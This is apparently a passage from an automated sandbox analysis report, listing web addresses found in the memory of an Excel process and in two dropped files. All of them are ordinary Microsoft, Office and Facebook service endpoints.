    Source: EXCEL.EXE, 00000000.00000003.496187028.0000000013641000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.768882304.0000000015CDE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497598992.000000001353C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.504647326.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.620387042.0000000015CC9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.677945944.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581482859.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678673663.0000000015CDD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497249883.0000000013641000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579110952.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505338190.000000001353C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.641789083.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.677925063.0000000015CC9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.768840672.0000000015CC6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.620403646.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637473162.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756202435.0000000015CC4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.617281899.0000000015CD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.577081581.0000000015CD6000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://api.w.org/
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://apis.live.net/v5.0/rlq
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/?
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/OneNoteBulletinshttps://
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://augloop.office.com
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2Bearer
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2U
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2https://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000000.00000002.762957049.000000000DB3D000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.
    Source: EXCEL.EXE, 00000000.00000003.755751851.000000000F8E2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576682242.000000000F8E2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.504342762.000000000F8E2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.765651167.000000000F8E2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301259993.0000000013319000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://cdn.entity.
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell3
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://clients.config.office.net/
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/4
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspxOneNoteCloudFilesConsumerEmbedhttps://onedrive.live.com/em
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://config.edge.skype.com
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com-
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
    Source: EXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496650266.0000000015D98000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496638408.0000000015D97000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drString found in binary or memory: https://connect.facebook.net/es_LA/sdk/xfbml.customerchat.js
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://cortana.ai
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://cortana.ai/api
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/apiBearer
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/apihttps://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aiet-
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://cr.office.com
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/#
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/-
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearer
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileed
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/https://login.windows.net/common/oauth2/authorize
